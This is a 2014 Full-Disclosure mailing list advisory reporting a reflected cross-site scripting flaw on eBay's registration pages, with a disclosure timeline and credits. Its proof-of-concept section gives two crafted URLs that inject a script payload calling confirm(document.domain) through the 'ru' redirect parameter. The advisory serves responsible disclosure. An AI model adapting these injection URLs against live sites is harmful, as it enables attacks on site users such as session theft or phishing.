lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <5383B6E9.70905@darksecurity.de>
Date: Mon, 26 May 2014 23:49:29 +0200
From: Stefan Schurtz <security@...ksecurity.de>
To: fulldisclosure@...lists.org
Subject: [FD] reg.ebay.com - Cross-site Scripting vulnerability

Advisory: reg.ebay.com - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2014-004
Author: Stefan Schurtz
Affected Software: Successfully tested on reg.ebay.com
Vendor URL: http://www.ebay.com/
Vendor Status: informed

==========================
Vulnerability Description
==========================

The website "reg.ebay.com" is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo=&siteid=0&UsingSSL=1&co_partnerId=2&MfcISAPICommand=RegisterEnterInfo&co_partnerId=2
&siteid=0&ru=http%253A%252F%252Fwww.ebay.com%252Fusr%252Fpatrice.php%253Ffol%253D7df875b8eb5a9c9a78d92c72acc2fb8dd6e6dfa4eee1
a922ab5464ffcd09d322%2526widget%253Dfollow_113459%22%3bconfirm%28document.domain%29%2f%2f4189ebe3a
&bin=3984&pageType=3984&register_signin=Register

https://reg.ebay.com/reg/PartialReg?siteid=0&ru=http%3A%2F%2Fwww.ebay.com%2Fusr%2Fpatrice.php%3Ffol%3D7df875b8eb5a9c9a
78d92c72acc2fb8dd6e6dfa4eee1a922ab5464ffcd09d322%26widget%3Dfollow_113459
%22%3Bconfirm%28document.domain%29%2F%2F4189ebe3a&MfcISAPICommand=

==========================
Solution
==========================

-

==========================
Disclosure Timeline
==========================

30-Jan-2014 - ebay informed via
"http://pages.ebay.com/securitycenter/Researchers.html"

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.ebay.com/
http://www.darksecurity.de/advisories/2014/SSCHADV2014-004.txt

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ